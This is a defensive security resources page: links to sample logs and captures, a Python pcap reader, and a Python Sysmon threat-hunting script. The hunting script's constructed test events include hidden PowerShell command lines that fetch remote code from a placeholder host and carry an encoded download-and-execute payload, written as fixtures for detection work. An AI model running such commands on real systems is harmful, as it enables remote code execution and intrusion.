LOGS

SAMPLE LOGS

A good resource for sample log lines from many common services and devices (SSH, web servers, mail, firewalls, Windows and others), useful when writing or testing parsers, decoders and detection rules:

https://ossec-docs.readthedocs.io/en/latest/log_samples/

Sample captures from the Wireshark wiki, covering a wide range of protocols:

https://wiki.wireshark.org/SampleCaptures

Public pcaps from CTFs and other captures collected by Netresec:

https://www.netresec.com/?page=PcapFiles
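Before loading any of these captures into a tool, it helps to know what the on-disk format actually is. The script below is an added example, not code from Wireshark, the Wireshark wiki or Netresec: it reads the classic libpcap (.pcap) format with only the standard library, validates the magic number and record lengths, and decodes Ethernet/IPv4/TCP headers far enough to summarise each packet. The one-packet capture it parses is constructed in memory with hypothetical addresses so it runs offline; note that pcapng, the default format of current Wireshark versions, is a different container and is rejected rather than misread.

```python
"""Minimal libpcap (.pcap) reader using only the standard library.

Added example for this page; it is not code from Wireshark, the Wireshark
wiki or Netresec.  The one-packet capture is constructed in memory with
hypothetical addresses so the script runs offline.  pcapng (the default
format of current Wireshark) is a different format and is rejected here.
"""
import struct

# pcap magic number as read little-endian -> (struct byte order, timestamp ticks per second)
PCAP_MAGIC = {
    0xA1B2C3D4: ("<", 1_000_000),      # little-endian, microsecond timestamps
    0xD4C3B2A1: (">", 1_000_000),      # big-endian, microsecond timestamps
    0xA1B23C4D: ("<", 1_000_000_000),  # little-endian, nanosecond timestamps
    0x4D3CB2A1: (">", 1_000_000_000),  # big-endian, nanosecond timestamps
}
LINKTYPE_ETHERNET = 1
TCP_FLAG_NAMES = [(0x02, "S"), (0x10, "A"), (0x01, "F"), (0x04, "R"), (0x08, "P")]


def build_sample_pcap() -> bytes:
    """Construct a one-record pcap: Ethernet/IPv4/TCP SYN 10.0.0.1:40000 -> 10.0.0.2:80 (made-up values)."""
    eth = bytes.fromhex("00112233445566778899aabb") + b"\x08\x00"  # dst MAC, src MAC, ethertype IPv4
    # TCP: sport, dport, seq, ack, data offset (5 words) << 4, flags SYN, window, checksum, urgent
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    # IPv4: version/IHL, TOS, total length, id, flags/frag, TTL, proto 6 (TCP), checksum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    frame = eth + ip + tcp
    # Global header: magic, version 2.4, thiszone, sigfigs, snaplen, linktype (Ethernet)
    global_hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    # Record header: ts_sec, ts_usec, incl_len (bytes captured), orig_len (bytes on the wire)
    record_hdr = struct.pack("<IIII", 1700000000, 123456, len(frame), len(frame))
    return global_hdr + record_hdr + frame


def summarize_frame(frame: bytes, ts: float) -> dict:
    """Decode Ethernet -> IPv4 -> TCP headers just far enough for a one-line summary."""
    info = {"ts": ts, "len": len(frame)}
    if len(frame) < 14:
        return info
    info["ethertype"] = struct.unpack("!H", frame[12:14])[0]
    if info["ethertype"] != 0x0800:  # only IPv4 is decoded here
        return info
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ihl < 20 or len(ip) < ihl:
        return info
    info["src"] = ".".join(str(b) for b in ip[12:16])
    info["dst"] = ".".join(str(b) for b in ip[16:20])
    info["proto"] = ip[9]
    if info["proto"] == 6 and len(ip) >= ihl + 20:
        info["sport"], info["dport"] = struct.unpack("!HH", ip[ihl:ihl + 4])
        flags = ip[ihl + 13]
        info["flags"] = "".join(name for bit, name in TCP_FLAG_NAMES if flags & bit)
    return info


def parse_pcap(data: bytes):
    """Return (linktype, [packet summaries]); raise ValueError on malformed input."""
    if len(data) < 24:
        raise ValueError("too short for a pcap global header")
    magic = struct.unpack("<I", data[:4])[0]
    if magic not in PCAP_MAGIC:
        raise ValueError(f"unknown magic {magic:#x} (pcapng or not a capture file)")
    order, ticks = PCAP_MAGIC[magic]
    _magic, _vmaj, _vmin, _tz, _sig, _snaplen, linktype = struct.unpack(order + "IHHiIII", data[:24])
    packets, offset = [], 24
    while offset < len(data):
        if offset + 16 > len(data):
            raise ValueError("truncated record header")
        ts_sec, ts_frac, incl_len, orig_len = struct.unpack(order + "IIII", data[offset:offset + 16])
        offset += 16
        # incl_len must fit in the file and can never exceed the original wire length
        if incl_len > orig_len or offset + incl_len > len(data):
            raise ValueError(f"bad record at offset {offset - 16}: incl_len={incl_len}")
        payload = data[offset:offset + incl_len]
        offset += incl_len
        ts = ts_sec + ts_frac / ticks
        if linktype == LINKTYPE_ETHERNET:
            packets.append(summarize_frame(payload, ts))
        else:
            packets.append({"ts": ts, "len": incl_len})
    return linktype, packets


if __name__ == "__main__":
    linktype, packets = parse_pcap(build_sample_pcap())
    print("linktype:", linktype)
    for packet in packets:
        print(packet)
```

The length checks matter in practice: a crafted or truncated record header with an oversized `incl_len` is the kind of input that has tripped up capture tools, so a reader should reject it rather than slice past the end of the buffer.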

SPLUNK WITH SYSMON

A good walkthrough of threat hunting with Sysmon data in Splunk:

https://medium.com/@haggis_m/splunking-the-endpoint-threat-hunting-with-sysmon-9dd956e3e1bd
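To make the idea concrete without a Splunk instance, here is an added example (not code from the linked article, Splunk or Sysmon) that runs two widely used process-creation hunts over events in the XML shape Sysmon writes to the Windows event log: an Office application spawning a script host, and PowerShell launched with an encoded command, which the script also decodes. The events, hosts, users and paths are constructed for the example, and the two rules are common heuristics rather than a complete hunt.

```python
"""Two Sysmon Event ID 1 (process creation) hunts over event-log XML.

Added example for this page; it is not code from the linked article, Splunk
or Sysmon.  SAMPLE_EVENTS are constructed with hypothetical users and paths.
"""
import base64
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def make_event(event_id: int, **data) -> str:
    """Build a Sysmon-style event record (constructed test input, not a real log)."""
    fields = "".join(f'<Data Name="{k}">{escape(str(v))}</Data>' for k, v in data.items())
    return ('<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            '<System><Provider Name="Microsoft-Windows-Sysmon" />'
            f'<EventID>{event_id}</EventID></System>'
            f'<EventData>{fields}</EventData></Event>')


# Constructed sample: one benign logon child, one Office -> cmd chain, one encoded PowerShell,
# and one network-connection event (ID 3) that the process-creation rules must ignore.
SAMPLE_EVENTS = [
    make_event(1, Image=r"C:\Windows\explorer.exe", ParentImage=r"C:\Windows\System32\userinit.exe",
               CommandLine="explorer.exe", User="CORP\\alice", ProcessGuid="{guid-1}"),
    make_event(1, Image=r"C:\Windows\System32\cmd.exe",
               ParentImage=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
               CommandLine='cmd.exe /c powershell -w hidden -c "iwr http://example.invalid/x"',
               User="CORP\\alice", ProcessGuid="{guid-2}"),
    make_event(1, Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               ParentImage=r"C:\Windows\explorer.exe",
               CommandLine="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
               User="CORP\\bob", ProcessGuid="{guid-3}"),
    make_event(3, Image=r"C:\Windows\System32\svchost.exe", DestinationIp="10.0.0.5",
               DestinationPort="443", ProcessGuid="{guid-4}"),
]


def parse_sysmon_event(xml_text: str) -> dict:
    """Flatten a Windows event XML into {"EventID": n, <Data Name>: value, ...}; namespace-agnostic."""
    event = {}
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]  # strip the {namespace} prefix ElementTree adds
        if tag == "EventID":
            event["EventID"] = int(el.text)
        elif tag == "Data" and el.get("Name"):
            event[el.get("Name")] = el.text or ""
    return event


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the switch is absent.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...),
    so matching the literal string "-EncodedCommand" alone would miss most uses.
    The payload is base64 of UTF-16LE text.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t.startswith(("-e", "/e")) and "-encodedcommand".startswith("-" + t[1:]):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return "<undecodable payload>"
    return None


def hunt(events):
    """Apply both rules to parsed events; return one finding per rule match."""
    findings = []
    for e in events:
        if e.get("EventID") != 1:
            continue
        image, parent = basename(e.get("Image", "")), basename(e.get("ParentImage", ""))
        cmdline = e.get("CommandLine", "")
        base = {"guid": e.get("ProcessGuid"), "user": e.get("User"), "image": image, "parent": parent}
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append({**base, "rule": "office_spawns_script_host", "cmdline": cmdline})
        if image in POWERSHELL:
            decoded = encoded_command(cmdline)
            if decoded is not None:
                findings.append({**base, "rule": "encoded_powershell", "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in hunt(parse_sysmon_event(x) for x in SAMPLE_EVENTS):
        print(finding)
```

The same logic translates directly to a Splunk search over Sysmon events (EventCode=1, wildcard matches on ParentImage and Image, then a lookup or eval on CommandLine); the point of the standalone version is that you can check a rule against known-good and known-bad records before it goes near production data.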

